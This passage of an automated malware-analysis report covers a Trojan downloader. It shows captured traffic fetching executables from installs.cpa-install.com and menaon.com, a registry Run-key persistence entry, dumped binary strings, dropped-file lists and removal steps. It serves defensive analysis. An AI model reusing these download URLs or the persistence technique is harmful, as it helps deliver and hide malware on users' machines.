\CurrentVersion\Run$Microsoft.hXXp://installs.cpa-install.com/update/c
lient_1/google.exe$Google.exe....
GET /update/client_1/updater.exe HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994
HTTP/1.1 200 OK
Date: Mon, 27 Oct 2014 06:01:41 GMT
Content-Type: application/octet-stream
Content-Length: 1042944
Connection: keep-alive
Last-Modified: Mon, 22 Sep 2014 20:44:31 GMT
ETag: "54208a2f-fea00"
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 17fcae32c11306a3-EWR
<<< skipped >>>
GET /update/client_1/google.exe HTTP/1.1
User-Agent: AutoIt
Host: installs.cpa-install.com
Cache-Control: no-cache
Cookie: __cfduid=d069756c1588410b3cc3eaf86cd20415d1414389698994
HTTP/1.1 200 OK
Date: Mon, 27 Oct 2014 06:01:48 GMT
Content-Type: application/octet-stream
Content-Length: 1048576
Connection: keep-alive
Last-Modified: Mon, 22 Sep 2014 20:44:31 GMT
ETag: "54208a2f-100000"
Accept-Ranges: bytes
Server: cloudflare-nginx
CF-RAY: 17fcae5bc30106a3-EWR
<<< skipped >>>
GET /downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe HTTP/1.1
User-Agent: AutoIt
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.menaon.com
Cookie: __cfduid=d0636a81161a7706fbd55743c8c3a09fe1414389719010
HTTP/1.1 200 OK
Date: Mon, 27 Oct 2014 06:01:59 GMT
Content-Type: application/x-msdownload
Content-Length: 1017024
Connection: keep-alive
Last-Modified: Fri, 09 May 2014 17:36:12 GMT
Accept-Ranges: bytes
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 17fcaea2693f0ef7-EWR
<<< skipped >>>
GET /downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe HTTP/1.1
User-Agent: AutoIt
Host: menaon.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Mon, 27 Oct 2014 06:01:59 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d0636a81161a7706fbd55743c8c3a09fe1414389719010; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.menaon.com; HttpOnly
Location: hXXp://VVV.menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 17fcae9fd0990ef1-EWR
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
Setup.exe_2404:
Google.exe_2196:
bdMiniDownloaderEG_MENAON-Mini_32_3313.exe_3740:
.text
`.rdata
@.data
.rsrc
@.reloc
UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU<UUU=>?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULMUUNUUUUUUUUUOUUPUQRST
!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FF<=>FF?FFFFF@ABFFFFFCFDFFFFFE
tcPh
%u Wj%
t.Gj:W
t-hL}J
SSSSh
xSSSh
FTPjKS
FtPj;S
C.PjRV
<!--%s-->
X;
</%s>
%s='%s'
%s="%s"
<![CDATA[%s]]>
standalone="%s"
encoding="%s"
version="%s"
RegOpenKeyTransactedW
RegCreateKeyTransactedW
httpheader
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
portuguese-brazilian
.jpeg
.html
0123456789
PORT
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Closing connection %d
Curl_addHandleToPipeline: length: %d
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
About to connect() to %s%s port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol %s not supported or disabled in libcurl
[^:]:%[^
:]://%[^
<url> malformed
http_proxy
%5[^:@]:%5[^@]
:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
User-Agent: %s
Connection #%ld to host %s left intact
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
Pipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Internal error clearing splay node = %d
Internal error removing splay node = %d
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Send failure: %s
Recv failure: %s
[%s %s %s]
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s%s%s
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
%s:%s:%s
%s:%.*s
%s:%s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%hu
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
CLIENT libcurl 7.30.0
MATCH %s %s %s
DEFINE %s %s
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Accept-Encoding: %s
Referer: %s
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LOGIN
USER %s
APOP %s %s
AUTH %s
No known authentication mechanisms supported!
STLS not supported.
STARTTLS denied. %c
Access denied. %c
Access denied: %d
Authentication failed: %d
PASS %s
%s %s
POP3S not supported!
login
password
%cd
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]
APPEND %s (\Seen) {%lld}LOGINDISABLED
STARTTLS not supported.
IMAPS not supported!
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
Adding handle: send: %d
Adding handle: recv: %d
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
Server %s is not blacklisted
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skips %d.%d.%d.%d for data connection, uses %s instead
%d.%d.%d.%d
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload:
RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
operation aborted by callback
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Operation timed out after %ld milliseconds with %lld bytes received
No URL set!
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
SMTP
EHLO %s
HELO %s
AUTH %s %s
Got unexpected smtp-server response: %d
Remote access denied: %d
smtp
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
MAIL failed: %d
RCPT failed: %d
SMTPS not supported!
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
d:d:d
d:d
%c%c==
%c%c%c=
%s xxxxxxxxxxxxxxxx
00000001
12345678
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
0123456789-
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
SYN.ACK
ACK.SYN
XXX
E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb
WS2_32.dll
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCrackUrlW
WININET.dll
SHLWAPI.dll
IPHLPAPI.DLL
PSAPI.DLL
PeekNamedPipe
GetCPInfo
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCloseKey
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
ole32.dll
ShellExecuteExW
SHFileOperationW
SHELL32.dll
GDI32.dll
GdiplusShutdown
gdiplus.dll
WSOCK32.dll
WinHttpCloseHandle
WinHttpGetProxyForUrl
WinHttpOpen
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
WLDAP32.dll
?456789:;<=
!"#$%&'()* ,-./0123
<4,$?7/'
(3-!0,1'8"5.*2$
zcÁ
.?AVCMD5Checksum@@
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
Eiexplore.exe
E-%%
1.0.0.0
HTTP/1.1
hXXp://en.browser.baidu.com/report/install.cgi?
SparkMiniInstall.ini
JhXXp://en.browser.baidu.com/query/package.xml?
Jspark.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe
/ChannelLaunchURL
Advapi32.dll
%s 0%%
%s -%%
/ChannelLaunchURL=
..\spark_install.exe
spark_install.exe
en.browser.baidu.com/license.html
en.browser.baidu.com/policy.html
en.browser.baidu.com
id.browser.baidu.com/license.html
id.browser.baidu.com/policy.html
id.browser.baidu.com
Portugu
br.browser.baidu.com/license.html
br.browser.baidu.com/policy.html
br.browser.baidu.com
th.browser.baidu.com/license.html
th.browser.baidu.com/policy.html
th.browser.baidu.com
%d.d.d-d:d:d
%s, Call DownloadOver, percent=%d, RetCode=%d
%s, DownloadRet = %d, costtime = f
%s, costtime = f
%s, Exception
%s, Start New Channel : %d
%s, limit download speed
%s, Error : Url or Path NULL
%s, Error : Url or Path empty
%s First DestPath = %s
%s URL = %s
%s, Error : work thread start
%s, Error : Path can't write
%s, Error : CreateDirectory fail
%s, Error : Path no legal
%s, Error : Re In
F%s, End
%s, Start
X-X-x-XX-XXXXXX
%s, GetLastError=%d
%s, percent=%d, Speed=%I64d
%s, want to StopThread
%s, StartNewThread : %d
%s, cookie = %d
%s, It should not happen
%s, Stop Thread
%s, Fail download : retry times = %d
%s, Fail more than max retry time!!!
%s, Network error
%s, CTimerStartChannelTask Stop Thread
%s, Stop a Channel : %d
%s, CDownloadPartOverTask StopNewThread
%s, Respone = %d
%s, curl_easy_perform = %d
%s No Valid Dest Path Error
%s No ReuseSameFile : RemoteFileSize no same
%s No ReuseSameFile : configured size big than remote file
%s No ReuseSameFile : channel num error
%s No ReuseSameFile
%s url md5 = %s
%s, First Start StartNewThread : %d
%s, Call DownloadStart
%s, MemMap UniqueID:%s
%s Final DestPath = %s
%s Big File No NTFS disk
%s, DeleteFile GetLastError=%d
%s No Support Range
%s remote size = %I64d
%s, GetRemoteFileSize : Retry = %d
%s, GetNetFileSize Respone = %d
%s, GetNetFileSize curl_easy_perform = %d
%s Proxy: %s
%s IE Proxy: %s
%s, Network Error
C%s, no gnet file
%s gnet info: %s
.gnet
%s, cookie:%d, responsecode:%d
%s, mapFile Write Error
%s, cookie:%d, head:%s
127.0.0.1
https=
http=
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Baidu\Common\I18N\conf.db
%s(%d)%s
\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt
%dddddd
XXxXXXXXXXX
\/:*?"<>|
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe
1.0.0.2
bdMiniDownload.exe
spark_install.exe_2464:
.text
`.rdata
@.data
.idata
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
Data Error in encrypted file. Wrong password?
CRC Failed in encrypted file. Wrong password?
Unsupported Method
Can not open encrypted archive. Wrong password?
Enter password (will not be echoed):
-p{Password}: set Password
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Google.exe:2196
vcredistx64.exe:3620
%original file name%.exe:2736
Index.exe:3872
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (129048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (488329 bytes)
%Documents and Settings%\%current user%\Cookies\SCIB46R7.txt (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\21.6214035581797\8.50130400527269.txt (406 bytes)
C:\29bb03690662e5ba2efc\1028\LocalizedData.xml (753 bytes)
C:\29bb03690662e5ba2efc\sqmapi.dll (2385 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqNotMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\SetupResources.dll (17 bytes)
C:\29bb03690662e5ba2efc\3082\SetupResources.dll (18 bytes)
C:\29bb03690662e5ba2efc\1041\LocalizedData.xml (885 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate4.ico (894 bytes)
C:\29bb03690662e5ba2efc\1041\SetupResources.dll (15 bytes)
C:\29bb03690662e5ba2efc\Strings.xml (14 bytes)
C:\29bb03690662e5ba2efc\1036\LocalizedData.xml (512 bytes)
C:\29bb03690662e5ba2efc\1040\SetupResources.dll (776 bytes)
C:\29bb03690662e5ba2efc\Graphics\Save.ico (1150 bytes)
C:\29bb03690662e5ba2efc\1036\eula.rtf (8 bytes)
C:\29bb03690662e5ba2efc\2052\LocalizedData.xml (403 bytes)
C:\29bb03690662e5ba2efc\1028\SetupResources.dll (13 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate5.ico (894 bytes)
C:\29bb03690662e5ba2efc\vc_red.msi (2454 bytes)
C:\29bb03690662e5ba2efc\DisplayIcon.ico (1877 bytes)
C:\29bb03690662e5ba2efc\SetupUi.dll (4564 bytes)
C:\29bb03690662e5ba2efc\1042\eula.rtf (1061 bytes)
C:\29bb03690662e5ba2efc\1040\LocalizedData.xml (807 bytes)
C:\29bb03690662e5ba2efc\DHtmlHeader.html (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Print.ico (1 bytes)
C:\29bb03690662e5ba2efc\1042\SetupResources.dll (14 bytes)
C:\29bb03690662e5ba2efc\1036\SetupResources.dll (993 bytes)
C:\29bb03690662e5ba2efc\vc_red.cab (72837 bytes)
C:\29bb03690662e5ba2efc\header.bmp (7 bytes)
C:\29bb03690662e5ba2efc\UiInfo.xml (1675 bytes)
C:\29bb03690662e5ba2efc\3082\eula.rtf (842 bytes)
C:\29bb03690662e5ba2efc\3082\LocalizedData.xml (994 bytes)
C:\29bb03690662e5ba2efc\SetupEngine.dll (12353 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate6.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate1.ico (894 bytes)
C:\29bb03690662e5ba2efc\1042\LocalizedData.xml (341 bytes)
C:\29bb03690662e5ba2efc\1049\LocalizedData.xml (592 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate3.ico (894 bytes)
C:\29bb03690662e5ba2efc\Graphics\SysReqMet.ico (1 bytes)
C:\29bb03690662e5ba2efc\1049\eula.rtf (924 bytes)
C:\29bb03690662e5ba2efc\watermark.bmp (6023 bytes)
C:\29bb03690662e5ba2efc\SplashScreen.bmp (1049 bytes)
C:\29bb03690662e5ba2efc\$shtdwn$.req (788 bytes)
C:\29bb03690662e5ba2efc\1031\eula.rtf (789 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate7.ico (894 bytes)
C:\29bb03690662e5ba2efc\1033\LocalizedData.xml (1023 bytes)
C:\29bb03690662e5ba2efc\1028\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Setup.ico (182 bytes)
C:\29bb03690662e5ba2efc\1041\eula.rtf (358 bytes)
C:\29bb03690662e5ba2efc\1031\LocalizedData.xml (658 bytes)
C:\29bb03690662e5ba2efc\2052\eula.rtf (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\warn.ico (10 bytes)
C:\29bb03690662e5ba2efc\2052\SetupResources.dll (272 bytes)
C:\29bb03690662e5ba2efc\1033\SetupResources.dll (16 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate8.ico (894 bytes)
C:\29bb03690662e5ba2efc\1031\SetupResources.dll (140 bytes)
C:\29bb03690662e5ba2efc\Graphics\stop.ico (10 bytes)
C:\29bb03690662e5ba2efc\1033\eula.rtf (7 bytes)
C:\29bb03690662e5ba2efc\Setup.exe (932 bytes)
C:\29bb03690662e5ba2efc\1040\eula.rtf (9 bytes)
C:\29bb03690662e5ba2efc\ParameterInfo.xml (654 bytes)
C:\29bb03690662e5ba2efc\SetupUi.xsd (556 bytes)
C:\29bb03690662e5ba2efc\Graphics\Rotate2.ico (894 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Microsoft Visual C 2010 x64 Redistributable Setup_20141027_025649617.html (54118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup_20141027_025641351.html (55598 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HFIB5.tmp.html (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcredistx64.exe (41656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (44680 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5641 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\SparkMiniInstall.ini (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\package[1].xml (289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\f0a5413bf497ed577eae2a88a8b8a193.gnet.tmp (5043 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\temp\test4822FBB5_0309_420f_9DA2_FA5B8B854946\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt (10 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\DA7WUGUH.txt (120 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe (129227 bytes)
%Documents and Settings%\%current user%\Application Data\Google\int\Google.exe (129271 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\updater[1].exe (489073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\google[1].exe (489298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.76808708626777\11.3678106125444.txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\Updater.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.